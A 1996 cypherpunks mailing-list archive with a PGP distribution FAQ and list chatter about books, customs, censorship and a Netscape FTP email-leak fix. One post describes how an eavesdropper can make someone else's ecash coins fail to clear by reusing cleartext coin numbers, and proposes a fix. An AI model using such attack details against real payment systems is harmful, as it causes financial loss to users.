ftp://miyako.dorm.duke.edu/mpj/crypto/voice/naut092.zip
ftp://ftp.dsi.unimi.it/pub/security/crypt/cypherpunks/nautilus
ftp://ftp.ox.ac.uk/pub/crypto/misc

The Colorado Catacombs BBS 303-772-1062


HOW DO I ENCRYPT MY DISK ON-THE-FLY?

Rather than manually encrypting and decrypting files, it is sometimes easier
(and therefore more secure, because you are more likely to use it) to use a
utility that encrypts or decrypts files on the fly as you use them in your
favorite applications. This also allows you to automatically encrypt
temporary files generated by your applications if they are on the encrypted
volume.

Secure File System (SFS) is a DOS device driver that encrypts an entire
partition on the fly using SHA in feedback mode.

Secure Drive also encrypts an entire DOS partition, using IDEA, which is
patented.

Secure Device is a DOS device driver that encrypts a virtual, file-hosted
volume with IDEA.

Cryptographic File System (CFS) is a Unix device driver that uses DES.

http://www.cs.auckland.ac.nz/~pgut01/sfs.html
ftp://ftp.informatik.uni-hamburg.de/pub/virus/crypt/disk/
ftp://ftp.csn.net/mpj/I_will_not_export/crypto_???????/disk/
ftp://ftp.csn.net/mpj/README for the ???????)
ftp://miyako.dorm.duke.edu/mpj/crypto/disk/
ftp://ftp.nic.surfnet.nl/surfnet/net-security/encryption/disk/
ftp://ftp.demon.co.uk/pub/ibmpc/secdev/secdev14.arj


WHERE IS PGP'S COMPETITION?

RIPEM is the second most popular freeware email encryption package.
I like PGP better for lots of reasons, but if for some reason you want
to check or generate a PEM signature, RIPEM is available at
ripem.msu.edu. There is also an exportable RIPEM/SIG.
ftp://ripem.msu.edu/pub/GETTING_ACCESS


HOW DO I PUBLISH MY PGP PUBLIC KEY?

Send mail to one of these addresses with the single word "help" in the
subject line to find out how to use them. These servers sychronize keys with
each other.

pgp-public-keys@keys.pgp.net
pgp-public-keys@keys.de.pgp.net
pgp-public-keys@keys.no.pgp.net
pgp-public-keys@keys.uk.pgp.net
pgp-public-keys@keys.us.pgp.net
pgp-public-keys@burn.ucsd.edu
pgp-public-keys@pgp.cc.gatech.edu
pgp-public-keys@goliat.upc.es
pgp-public-keys@demon.co.uk
pgp-public-keys@dsi.unimi.it
pgp-public-keys@ext221.sra.co.jp
pgp-public-keys@fbihh.informatik.uni-hamburg.de
pgp-public-keys@jpunix.com
pgp-public-keys@kiae.su
pgp-public-keys@kr.com
pgp-public-keys@kram.org
pgp-public-keys@kub.nl
pgp-public-keys@nexus.hpl.hp.com
pgp-public-keys@pgp.ai.mit.edu
pgp-public-keys@pgp.barclays.co.uk
pgp-public-keys@gondolin.org
pgp-public-keys@pgp.dhp.com
pgp-public-keys@pgp.hpl.hp.com
pgp-public-keys@pgp.iastate.edu
pgp-public-keys@pgp.kr.com
pgp-public-keys@pgp.mit.edu
pgp-public-keys@pgp.ox.ac.uk
pgp-public-keys@pgp.pipex.net
pgp-public-keys@srce.hr
pgp-public-keys@sw.oz.au
pgp-public-keys@uit.no
pgp-public-keys@vorpal.com
pgp-public-keys@nic.surfnet.nl

WWW interface to the key servers:
http://www-swiss.ai.mit.edu/~bal/pks-toplev.html
http://www-lsi.upc.es/~alvar/pks/pks-toplev.html

For US $20/year or so, you can have your key officially
certified and published in a "clean" key database that is much less
susceptible to denial-of-service attacks than the other key servers.
Send mail to info-pgp@Four11.com
for information, or look at http://www.Four11.com/

PGP public keys which are stored on SLED's Four11 Key Server
are now retrievable by fingering UserEmailAddress@publickey.com.
Example: My e-mail addresses is mpj@csn.org finger
mpj@csn.org@publickey.com My key (mpj8) is at Four11.com, at
ftp://ftp.csn.net/mpj/mpj8.asc, on the key servers, on my BBS, and
available by finger.


CAN I COPY AND REDISTRIBUTE THIS FAQ?

Yes. Permission is granted to distribute unmodified copies of this FAQ.

Please e-mail comments to mpj@netcom.com


-----BEGIN PGP SIGNATURE-----
Version: 2.7.1

iQCVAwUBMPoQnvX0zg8FAL9FAQHgAwP+Of94tn35tUAaXsZXk4yDLZaOsk0YEgpT
3sSKrvYS78iHjNgRQDE+cAntOHeexYDQZ17ecSGAMqvcC1oOiPoeb0lV4lxGRCPK
plOnVQLSjgKyshb1mrOPnl25kZhiCOt6Std3nsNICgnMtz+SafRI5+hCLA+l+xUH
7fqHR8Dq6b0=
=sbwR
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Paul Johnson <mpj@netcom.com>
Date: Mon, 15 Jan 96 13:50:17 PST
To: cypherpunks@toad.com
Subject: Where to get PGP (short version of FAQ)
Message-ID: <Pine.SUN.3.91.960115134823.2645B-100000@netcom6>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

WHERE TO GET PGP FAQ (SHORT VERSION)

Revised 15 January 1996

For questions not covered here, please see alt.security.pgp FAQs at
rtfm.mit.edu.  For the long version of this FAQ, get
ftp://ftp.csn.net/mpj/getpgp.asc or send mail to mpjohnso@nyx.cs.du.edu or
point your web browser at http://www.csn.net/~mpj.


 WHAT IS THE LATEST VERSION OF PGP?

 Platform(s)       Latest Version        Distribution File Names
__________________________________________________________________________
|                |                     |                                 |
|DOS, Unix,      | Viacrypt PGP 2.7.1  | disk sets                       |
|Mac, Windows,   |                     |                                 |
|or WinCIM/CSNav |                     |                                 |
|________________|_____________________|_________________________________|
|                |                     |                                 |
|Hardware-based  | Viacrypt 2.7.1      | disk sets                       |
|PGP/Token       |                     |                                 |
|________________|_____________________|_________________________________|
|                |                     |                                 |
|DOS, Unix, VAX, | MIT PGP 2.6.2       | pgp262.zip  (DOS + docs)        |
|others          |                     | pgp262s.zip (source)            |
|                |                     | pg262s.zip source on CompuServe |
|                |                     | pgp262s.tar.gz (source)         |
|                |                     | pgp262s.tar.Z (source)          |
|                |                     | pgp262dc.zip (documentation)    |
|                |                     | pg262d.zip (docs on CompuServe) |
|________________|_____________________|_________________________________|
|                |                     |                                 |
|Macintosh       | MIT PGP 2.6.2       | MacPGP2.6.2-130v1.hqx           |
|                | Mac version 1.3.0   | m262pgp.hqx (same as above)     |
|                |                     | MacPGP2.6.2-130v1.source.asc    |
|                |                     | m262pgps.asc (same as above)    |
|                | PGPfone 1.0 beta 5  |                                 |
|________________|_____________________|_________________________________|
|                |                     |                                 |
|Power Mac       | Zbigniew's "beta"   | Fatmacpgp262b131.sea.hqx        |
|                |                     | f262pgp.hqx (same as above)     |
|                |                     | Fatmacpgp262b131.src.hqx        |
|                |                     | f262pgps.hqx (same as above)    |
|________________|_____________________|_________________________________|
|                |                     |                                 |
|Amiga           | PGP 2.6.2 Amiga 1.4 | pgp262-a14-000.lha              |
|                |                     | pgp262-a14-020.lha              |
|                |                     | pgp262-a14-src.lha              |
|                |                     | PGPAmi262is.lha (international) |
|________________|_____________________|_________________________________|
|                |                     |                                 |
|Atari           | Atari MIT PGP 2.6.2 | pgp262st.zip                    |
|                | Atari International | pgp262ib.zip                    |
|________________|_____________________|_________________________________|
|                |                     |                                 |
|OS/2            | MIT PGP 2.6.2       | pgp262-os2.zip                  |
|                |                     | on ftp.gibbon.com               |
|________________|_____________________|_________________________________|
|                |                     |                                 |
|Non-USA version | PGP 2.6.2i from     | pgp262i.zip  (DOS executable)   |
|to avoid RSAREF | Stale Schumacher,   | pgp262ix.zip (32-bit DOS)       |
|license.        | Kai Uwe Rommel,     | pgp262i-os2.zip (OS/2 exe)      |
|                | Harald Denker, and  | pgp262ib.zip (Atari)            |
|                | Peter Simons        | PGPAmi262is.lha (Amiga)         |
|                |                     | pgp262is.zip (source)           |
|                |                     | pgp262is.tar.gz (Unix source)   |
|                |                     |                                 |
|                | Canadian "mutant"   | MacPGP262ca124.exe.sea.hqx      |
|                | not for USA use     | MacPGP262ca124.src.sea.hqx      |
|________________|_____________________|_________________________________|
|                |                     |                                 |
|Unofficial      | PGP 2.6.2ui         | pgp262iu.zip                    |
|non-USA version | Not for use in the  |                                 |
|fully under Gnu | USA because of      |                                 |
|public license  | probable patent     |                                 |
|(based on 2.3a  | infringement        |                                 |
|code)           | problems.           |                                 |
|________________|_____________________|_________________________________|



WHERE CAN I GET VIACRYPT PGP?

Just call 800-536-2664 and read them your credit card number and your
address.


WHERE IS PGP ON THE WORLD WIDE WEB?

 * http://web.mit.edu/network/pgp-form.html (U. S. PGP primary distribution
   site)

 * http://web.mit.edu/network/pgpfone (PGP Fone primary distribution site)

 * http://www.ifi.uio.no/~staalesc/PGP/home.html (International PGP
   primary distribution site)

 * http://www.epic.org/privacy/tools.html

 * http://www.csua.berkeley.edu/cypherpunks/home.html

 * http://www.leo.org/archive/os2/crypt/


WHERE CAN I FTP PGP IN NORTH AMERICA?

If you are in the USA or Canada, you can get PGP by following the
instructions in any of:


 * ftp://net-dist.mit.edu/pub/PGP/README

 * ftp://ftp.csn.net/mpj/README.MPJ

 * ftp://miyako.dorm.duke.edu/pub/GETTING_ACCESS

 * ftp://ftp.csua.berkeley.edu/pub/cypherpunks/pgp/

 * ftp://ftp.gibbon.com/pub/pgp/README.PGP

 * ftp://ftp.wimsey.bc.ca/pub/crypto/software/README


WHERE IS PGP ON COMPUSERVE?


GO NCSAFORUM. Follow the instructions there to gain access to Library 12:
Export Controlled.


AOL

It is possible to get PGP from ftp sites with hidden directories
with the following trick:  (1) View the README file with the hidden
directory name in it, then quickly (2) Start a new ftp connection,
specifiying the hidden directory name with the ftp site's address, like
ftp.csn.net/mpj/I_will_not_export/crypto_xxxxxxx (where the xxxxxxx is
replaced with the current character string).


WHAT BULLETIN BOARD SYSTEMS CARRY PGP?

MANY BBS carry PGP. The following carry recent versions of PGP and allow free
downloads of PGP.

   303-772-1062 Colorado Catacombs BBS, Longmont CO

   317-887-9568 Computer Virus Research Center (CVRC) BBS, Indianapolis, IN
   Login First Name: PGP  Last Name: USER   Password: PGP

   914-667-4567 Exec-Net, New York, NY

   915-587-7888, Self-Governor Information Resource, El Paso, Texas


WHERE CAN I FTP PGP CLOSE TO ME?

 * DE

ftp://ftp.informatik.uni-hamburg.de/pub/virus/crypt/pgp
ftp://ftp.uni-kl.de/pub/aminet/util/crypt
ftp://ftp.westfalen.de/pd/Atari/Pgp(Atari)

 * ES

ftp://encomix.es/pub/pgp/pgp262i/pgp262i.zip

 * IT

ftp://ftp.dsi.unimi.it/pub/security/crypt/PGP

 * FI

ftp://ftp.funet.fi/pub/crypt

 * NL

ftp://ftp.nl.net/pub/crypto/pgp
ftp.nic.surfnet.nl/surfnet/net-security/encryption/pgp

 * SE

ftp://leif.thep.lu.se

 * UK

ftp://ftp.demon.co.uk/pub/amiga/pgp
ftp://ftp.ox.ac.uk/pub/crypto/pgp


HOW CAN I GET PGP BY EMAIL?

If you have access to email, but not to ftp, send a message saying
"help" to
ftpmail@decwrl.dec.com, mailserv@nic.funet.fi,
or  ftp-request@netcom.com

 To get pgp 2.6.2i by email:
  Send a message to
pgp@hypnotech.com with your request in the
  Subject: field.

Subject What you will get GET pgp262i.zip MS-DOS executable
(uuencoded) GET pgp262is.zip MS-DOS source code (uuencoded) GET
pgp262is.tar.gz UNIX source code (uuencoded)

For FAQ
information, send e-mail to mail-server@rtfm.mit.edu
with
    send usenet/news.answers/ftp-list/faq
in the body of the message.


WHAT ARE SOME GOOD PGP BOOKS?
      Protect Your Privacy: A Guide for PGP Users
      by William Stallings
      Prentice Hall PTR
      ISBN 0-13-185596-4
      US $19.95

      PGP: Pretty Good Privacy
      by Simson Garfinkel
      O'Reilly & Associates, Inc.
      ISBN 1-56592-098-8
      US $24.95

      E-Mail Security: How to Keep Your Electronic Mail Private
      "Covers PGP/PEM"
      by Bruce Schneier
      Wiley Publishing

      The Computer Privacy Handbook: A Practical Guide to E-Mail Encryption,
      Data Protection, and PGP Privacy Software
      by Andre Bacard
      Peachpit Press
      ISBN 1-56609-171-3
      US $24.95
      800-283-9444 or 510-548-4393

      THE OFFICIAL PGP USER'S GUIDE
      by Philip R. Zimmerman
      MIT Press
      April 1995 - 216 pp. - paper - US $14.95 - ISBN 0-262-74017-6 ZIMPP

      PGP SOURCE CODE AND INTERNALS
      by Philip R. Zimmerman
      April 1995 - 804 pp. -
      US $55.00 - 0-262-24039-4 ZIMPH

      Ordering information for the last two books:
      Call US Toll Free 1-800-356-0343 or 617-625-8569.
      Cite code 5CSC and number 661.
      Allow 4-6 weeks for delivery within North America.
      Allow 8-12 weeks for delivery outside of North America.

      How to Use PGP, 61 pages,  (Pub #121) from the Superior
      Broadcasting Company,
      Box 1533-N, Oil City, PA 16301, phone: (814) 678-8801 (about US
      $10-$13).


WHERE CAN I GET PGP LANGUAGE MODULES?

http://www.ifi.uio.no/~staalesc/PGP/language.html
ftp://ftp.ifi.uio.no/pub/pgp/doc/


IS PGP LEGAL?

Yes.  See ftp://ftp.csn.net/mpj/getpgp.asc for some of the issues.


WHAT IS PHILIP ZIMMERMANN'S LEGAL STATUS?

Philip Zimmermann was under investigation for alleged violation of export
regulations, with a grand jury hearing evidence for about 28 months, ending
11 January 1996. The Federal Government chose not to comment on why it
decided to not prosecute, nor is it likely to.  The Commerce Secretary stated
that he would seek relaxed export controls for cryptographic products, since
studies show that U. S. industry is being harmed by current regulations.
Philip endured some serious threats to his livelihood and freedom, as well as
some very real legal expenses, for the sake of your right to electronic
privacy.

Although there was no direct and open legal battle, there was a lot of behind
the scenes work by Phil's legal team, headed by Philip L. Dubois
(dubois@dubois.com). GREAT JOB!  If you ever are in the situation of needing
a good lawyer to help you with similar Federal harassment, consider yourself
fortunate if Mr. Dubois will take your case.

Philip Zimmermann is breathing more easily these days, still a free man and
able to work to support his family.  The battle is won, but the war is not
over. The regulations that caused him so much grief and which continue to
dampen cryptographic development, harm U. S. industry, and do violence to the
U. S. National Security by eroding the First Ammendment of the U. S.
Constitution and encouraging migration of cryptographic industry outside of
the U. S. A. are still on the books.  If you are a U. S. Citizen, please
write to your U. S. Senators, Congressional Representative, President, and
Vice President pleading for a more sane and fair cryptographic policy.


WHERE CAN I GET WINDOWS & DOS SHELLS FOR PGP?

http://www.ifi.uio.no/~staalesc/AutoPGP.html
http://www.dayton.net/~cwgeib
ftp://oak.oakland.edu/SimTel/msdos/security/apgp22b.zip
ftp://oak.oakland.edu/SimTel/win3/security/pgpw40.zip
http://alpha.netaccess.on.ca/~spowell/crypto/pwf31.zip
ftp://ftp.netcom.com/pub/dc/dcosenza/pgpw40.zip
ftp://Sable.ox.ac.uk/pub
http://www.firstnet.net/~cwgeib/welcom.html
ftp://ftp.netcom.com/pub/ec/ecarp/pgpwind.zip
http://www.eskimo.com/~joelm(Private Idaho)
ftp://ftp.eskimo.com/~joelm
http://www.xs4all.nl/~paulwag/security.htm
http://www.LCS.com/winpgp.html
ftp://mirrors.aol.com/mir01/circa/pub/pc/win3/util/pwf31.zip
ftp://ftp.leo.org/pub/comp/os/os2/crypt/gcppgp10.zip
ftp://ftp.leo.org/pub/comp/os/os2/crypt/pmpgp.zip


WHERE DO I GET PGPfone(tm)?

PGPfone is in beta test for Macintosh users. A Windows 95 version is
being developed.

http://web.mit.edu/network/pgpfone
ftp://net-dist.mit.edu/pub/PGPfone/README
ftp.hacktic.nl/pub/pgp/pgpfone


WHERE DO I GET NAUTILUS?

Bill Dorsey, Pat Mullarky, and Paul Rubin have come out with a program called
Nautilus that enables you to engage in secure voice conversations between
people with multimedia PCs and modems capable of at least 7200 bps (but 14.4
kbps is better). See

ftp://ripem.msu.edu/pub/crypt/GETTING_ACCESS
ftp://ripem.msu.edu/pub/crypt/other/nautilus-phone-0.9.2-source.tar.gz
ftp://ftp.csn.net/mpj/README
ftp://ftp.csn.net/mpj/I_will_not_export/crypto_???????/voice/naut092.zip
ftp://miyako.dorm.duke.edu/pub/GETTING_ACCESS
ftp://miyako.dorm.duke.edu/mpj/crypto/voice/naut092.zip
ftp://ftp.dsi.unimi.it/pub/security/crypt/cypherpunks/nautilus
ftp://ftp.ox.ac.uk/pub/crypto/misc

The Colorado Catacombs BBS 303-772-1062


HOW DO I ENCRYPT MY DISK ON-THE-FLY?

Rather than manually encrypting and decrypting files, it is sometimes easier
(and therefore more secure, because you are more likely to use it) to use a
utility that encrypts or decrypts files on the fly as you use them in your
favorite applications. This also allows you to automatically encrypt
temporary files generated by your applications if they are on the encrypted
volume.

http://www.cs.auckland.ac.nz/~pgut01/sfs.html
ftp://ftp.informatik.uni-hamburg.de/pub/virus/crypt/disk/
ftp://ftp.csn.net/mpj/I_will_not_export/crypto_???????/disk/
ftp://ftp.csn.net/mpj/README for the ???????)
ftp://miyako.dorm.duke.edu/mpj/crypto/disk/
ftp://ftp.nic.surfnet.nl/surfnet/net-security/encryption/disk/
ftp://ftp.demon.co.uk/pub/ibmpc/secdev/secdev14.arj


HOW DO I PUBLISH MY PGP PUBLIC KEY?

Send mail to one of these addresses with the single word "help" in the
subject line to find out how to use them. These servers sychronize keys with
each other.

pgp-public-keys@keys.pgp.net
pgp-public-keys@keys.de.pgp.net
pgp-public-keys@keys.no.pgp.net
pgp-public-keys@keys.uk.pgp.net
pgp-public-keys@keys.us.pgp.net
pgp-public-keys@fbihh.informatik.uni-hamburg.de
pgp-public-keys@kiae.su
pgp-public-keys@pgp.ai.mit.edu
pgp-public-keys@pgp.iastate.edu
pgp-public-keys@pgp.mit.edu
pgp-public-keys@pgp.ox.ac.uk
pgp-public-keys@sw.oz.au

WWW interface to the key servers:
http://www-swiss.ai.mit.edu/~bal/pks-toplev.html

For US $20/year or so, you can have your key officially
certified and published in a "clean" key database that is much less
susceptible to denial-of-service attacks than the other key servers.
Send mail to info-pgp@Four11.com
for information, or look at http://www.Four11.com/


CAN I COPY AND REDISTRIBUTE THIS FAQ?

Yes. Permission is granted to distribute unmodified copies of this FAQ.

Please e-mail comments to mpj@netcom.com


-----BEGIN PGP SIGNATURE-----
Version: 2.7.1

iQCVAwUBMPoQzfX0zg8FAL9FAQEKUgQAl2nu1KMT1txZV87pgiiSMmuZcHSIyGvY
0maabI+pPg8FjtxJwcrfWjVVgQVyQGSBsh+NC0eQvGpW4DFWt1p7bCaINunBcohn
jf4xdqmejuIy0e52P0+Jgs88Y3UzudYcWnjAXP//fH569ThxlQoJmLiZI/IeKRk+
9pAVQAmPLec=
=YMrS
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: grimm@MIT.EDU
Date: Mon, 15 Jan 96 11:11:14 PST
To: tcmay@got.net
Subject: Re: New Puzzle Palace?
In-Reply-To: <ad1fe6fe020210049989@[205.199.118.202]>
Message-ID: <9601151911.AA00945@w20-575-119.MIT.EDU>
MIME-Version: 1.0
Content-Type: text/plain


My apologies, I was referring to "Applied Cryptography".

-James



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: grimm@MIT.EDU
Date: Mon, 15 Jan 96 11:17:05 PST
To: cypherpunks@toad.com
Subject: Bignum support in C++
In-Reply-To: <2.2.32.19960115191028.006dfe5c@mail.visi.net>
Message-ID: <9601151916.AA00949@w20-575-119.MIT.EDU>
MIME-Version: 1.0
Content-Type: text/plain



I didn't realize that so many people would be interested in big
integer support in C++.  But since I have received several requests
already, I will just post to the whole list.

I will be setting up a small web site tonight or tomorrow, so that
anyone who desires may view the code for supporting large integers in
C++.  Do not expect bulletproof optimized code.  I will post the URL
when it is ready.

-James



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Salz <rsalz@osf.org>
Date: Mon, 15 Jan 96 12:03:56 PST
To: cypherpunks@toad.com
Subject: Re: c'punks at RSA conference
Message-ID: <9601152000.AA22464@sulphur.osf.org>
MIME-Version: 1.0
Content-Type: text/plain


I'll be there Thursday.  I'm giving the talk scheduled to have been given
by Tom Klejna.  I'll be talking about DCE security architecture and
future directions and how public key fits in.  Red-eye flight back east.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeff Simmons <jsimmons@goblin.punk.net>
Date: Mon, 15 Jan 96 15:13:27 PST
To: cypherpunks@toad.com
Subject: Re: New Puzzle Palace?
In-Reply-To: <ad1fe6fe020210049989@[205.199.118.202]>
Message-ID: <199601152313.PAA00494@goblin.punk.net>
MIME-Version: 1.0
Content-Type: text/plain


> 
> I thought the thread was about "The Puzzle Palace." It's certainly possible
> that Bruce Schneier has contributed to a second edition, beyond the
> Foreward or whatever it is, but your comments fit with "Applied
> Cryptography" closely, too.
> 
> Have you seen a copy of "The Puzzle Palace," 2nd Ed.?
 
I wrote to Bruce Schneier about this a month or so ago.  He said that he'd
gotten the information about the new edition of "The Puzzle Palace" from
the authors, and that while the reference in "Applied Cryptography" gave
it a 1995 copyright, it actually won't be out until sometime in 1996.

-- 
Jeff Simmons                           jsimmons@goblin.punk.net



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: s1018954@aix2.uottawa.ca
Date: Mon, 15 Jan 96 12:24:26 PST
To: grimm@MIT.EDU
Subject: Re: New Puzzle Palace?
In-Reply-To: <9601151840.AA00925@w20-575-119.MIT.EDU>
Message-ID: <Pine.3.89.9601151533.C28480-0100000@aix2.uottawa.ca>
MIME-Version: 1.0
Content-Type: text/plain




On Mon, 15 Jan 1996 grimm@MIT.EDU wrote:

> Schneier has done a major rewrite, or at least included *lots* of new
> info.  I haven't gotten a copy yet, but I saw one, and it was twice as
> thick as the first version.
> 
Huh? Oh you mean Applied Crypto 2. I was asking about Puzzle Palace 2 by 
Bamford, which I saw listed in AC2's bibliography. Can't seem to find it.
I was just wondering if it's worth ordering. (Maybe I wasn't clear in my 
last msg.) 

Btw, anyone know what else Bamford's been doing since he wrote Puzzle Palace 1,
in '82? Any other books, articles? He's a Washington lawyer, right? I 
hear the new edition has a collaborating author; anything on him? Curious.

TIA.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Mon, 15 Jan 96 16:20:20 PST
To: bshantz@nwlink.com
Subject: Re: Phil Z getting through customs
Message-ID: <m0tbyRc-00090cC@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 08:32 AM 1/15/96 +0000, Brad Shantz wrote:
> attila <attila@primenet.com> wrote:
>>     answer the questions truthfully and they can not detain you???
>
>Not true, I've been detained by Canadian customs for doing just that.
>Everything went reasonably smoothly thanks to the customs officials 
>lack of knowledge of NAFTA.  However, one of my travelling partners 
>had trouble with customs due to ...hmmm... their lack of knowledge of 
>NAFTA.
>
>> 	Rule 1:	 smile regardless of the adversity
>
>That's a good rule for things other than customs dealings.

I haven't driven to Canada for well over a decade.  But last time I did, 
when I was addressed the Canadian border guy, he asked me whether I had 
brought any firearms along.  I said to him,  "No.  I didn't think I'd be 
needing them!"

He didn't as much as crack a smile.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Scott Brickner <sjb@universe.digex.net>
Date: Mon, 15 Jan 96 14:05:17 PST
To: Jeff Weinstein <jsw@netscape.com>
Subject: Re: (none) [httpd finding your identity]
In-Reply-To: <30F8596B.5611@netscape.com>
Message-ID: <199601152204.RAA18827@universe.digex.net>
MIME-Version: 1.0
Content-Type: text/plain


Jeff Weinstein writes:
>The snoop program is using FTP to find out the user's e-mail
>address.  The image on the page is an ftp: URL.  Our FTP code
>was sending the user's e-mail address as the password for
>anonymous FTP, which is the usually requested by FTP sites.
>The perl script was waiting for the FTP to happen, and then
>looking at its log to figure out the email address.
>
>  I've removed the code that uses the e-mail address as the
>FTP password for anonymous FTPs.  You can still enter it by
>hand by using a URL of this form 'ftp://anonymous@ftp.netscape.com'.
>This will cause the navigator to prompt the user for the 
>password to send for anonymous.  This is a little known feature
>that will also allow users to access non-anonymous ftp
>accounts via netscape.

Or you can use 'ftp://anonymous:password@ftp.netscape.com/', and
skip the prompt.  Not really less secure (assuming you can prevent
shoulder surfers) as FTP sends the password in the clear, anyway.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ian Goldberg <iang@CS.Berkeley.EDU>
Date: Mon, 15 Jan 96 16:14:41 PST
To: cypherpunks@toad.com
Subject: How to make someone else lose ecash
Message-ID: <199601160014.QAA20158@lagos.CS.Berkeley.EDU>
MIME-Version: 1.0
Content-Type: text/plain


I don't recall seeing this on cypherpunks or on ecash@digicash.com;
it's being sent to both places, so set your replies appropriately.

Dave and I were discussing the ecash protocols when we discovered
what seems to be a way for Eve (a passive eavesdropper) to cause
anyone to lose money.  Note that she doesn't gain anything from it.

Eve watches for any message that contains pcoins (a list of onl_coin).
These messages are the Payment (from user to shop) and Deposit (from
shop to mint).  Neither of these are required to be encrypted.

An onl_coin is the following:

onl_coin =
      [
        int     keyversion              ; low 5 bits are denomination
        MPI     n                       ; coin number
        MPI     sig                     ; encrypted coin signature
      ]

sig is (f(n)^(1/h) XOR f(payment_hdr)), encrypted in the mint's public key.

The reason sig is encrypted is so that the payment header can't be
changed and so that Eve can't learn f(n)^(1/h).  However, n is sitting
there all nice and cleartext.

Therefore: when Eve sees such a message, she uses the same value of n
to withdraw a coin from her bank account, and then spends it (she could
just pay it to herself).  Eve does not gain or lose anything, but if
she can deposit the coin before the original coin that she saw gets to
the mint, the original coin will not clear.  If Eve has the ability
to drop or delay packets, she can accomplish this easily.  The result
is that whoever withdrew the coin originally has lost the use of that
coin.

Note that this is the same problem as if two users just happen to use
the same value of n when they withdraw coins.  We don't really care
about that, since the probability is trivial.  However, this attack
lets Eve produce the same effect _on purpose_.

How can we prevent this?  Well, since a shop has no way of using the
value n except for just sending it on to the mint, we lose nothing by
encrypting it.  Thus, an onl_coin should be:

onl_coin =
      [
	    int     keyversion              ; low 5 bits are denomination
	Encrypt_with_mint_public_key(
	    MPI     n                       ; coin number
	    MPI     sig                     ; (f(n)^(1/h) XOR f(payment_hdr))
	)
      ]

Note that it's not really necessary to have sig already encrypted if
we're going to encrypt it again.  Actually, I think an onl_coin
should have an additional field (bankID) to the fields listed
above, but that's another argument for another time.

   - Ian "Back from the North and ready to party!"



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Mon, 15 Jan 96 18:31:18 PST
To: Simon Spero <ses@tipper.oit.unc.edu>
Subject: Re: Phil Z getting through customs
Message-ID: <m0tbzHU-0008zRC@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 11:21 AM 1/15/96 -0800, Simon Spero wrote:

>When I was a student and had long hair, I used to always get questioned
>when going throught customs. After graduating, and having normal length
>hair, I had a lot less trouble.

This seems odd.  Logically (okay, I know logic doesn't work with the 
government) any smuggler is going to try to be as innocuous as possible.  
He's cut his hair, and shave, and probably wear a tie, etc.  Which means the 
government should pay more attention to....

Oh, never mind!


>The strictest customs I've been through is at Lod (Tel Aviv); there the 
>assumption is that everybody is going to try and bring in at least 
>some sort of radio/fax machine to avoid the high taxes, so they check all 
>baggage. They do have the best security team in general though, so it 
>balances out.

Some comedian 15 years or so ago (David Brenner, maybe?) had a joke which  went 
something like this:

"The odds of there being a bomb on a commercial airliner is one in a 
million.  The odds of there being TWO bombs on a commercial airliner are one 
in a _million_million_.  Therefore, if you are taking an airplane flight and 
want to feel REALLY safe....Take a bomb!"





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <llurch@networking.stanford.edu>
Date: Mon, 15 Jan 96 16:31:42 PST
To: Lindsay Haisley <fmouse@fmp.com>
Subject: Re: Eggs at Customs (fwd)
In-Reply-To: <199601152336.RAA14733@gateway.fmp.com>
Message-ID: <Pine.ULT.3.91.960115162912.29666L-100000@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 15 Jan 1996, Lindsay Haisley wrote:

> There has (fortunately!) been a big crackdown recently on the illegal pet
> bird import trade, something akin to the slave trade of the 19th century for
> those of us who like pet birds.  One of the methods people use to import
> birds is to wear special vests full of pockets for rare bird eggs.  If the
> person who wrote this was coming in from SE Asia, especially Australia, then
> this was very possibly the meaning of the question.

And here I thought it was because eggs were a good medium for 
transporting biotoxins.

I've been hanging out with you conspiracy freaks too much :-)

-rich




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@mbcl.rutgers.edu>
Date: Mon, 15 Jan 96 13:44:30 PST
To: llurch@networking.stanford.edu
Subject: Re: COMMUNITY CONNEXION REFUSES TO CENSOR INTERNET SERVICES
Message-ID: <01I01O5R9B5OA0UGPP@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From: Rich Graves <llurch@networking.stanford.edu>

>To play Devil's Advocate here, I don't think this is as big a deal as
either side is making it out to be. At least according to dgillmor's
column in today's San Jose Mercury News, SW meant (or has "clarified" his
statements to mean) that he favors only limited remedial (not prior)
restraints on "hate speech" (whatever the hell that means) on Web pages
that approach "publishing" quality and distribution. SW does not favor 
and in fact opposes censoring newsgroups and email.
----------
	Yes, it's good that he's favoring less restraint on speech than had
previously appeared to be the case... but that still doesn't mean it's right.
Is the censorship of broadcast media any better (of "indecent" speech) any
better because after some time in the evening it doesn't apply?
----------

>I don't think any media outlet should be forced to carry something it 
finds objectionable. Libertarian notions like freedom of association and 
the fact that freedom of the press belongs to the guy who owns the damn 
press come into play here.
------------
	What the SWC appears to be doing is not saying that they'd refuse
certain groups access if they were running an ISP. They're trying to make it
look like any ISP that carries certain web pages is evil... and, to some
degree, this appears to me that they're putting pressure on governments to
ban the speech in question. I would guess that they support the ban in Germany,
for instance. In addition, the fewer ISPs are carrying the information, the
easier it is to ban entirely.
-----------

>I very much applaud Sameer for his principles and hard work, but SW and 
the like have their own principles. They're not incompatible in a free 
society.
-----------
	The problem is not the principles of the SWC... it's their tactics.
	-Allen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Mon, 15 Jan 96 18:34:07 PST
To: cypherpunks@toad.com
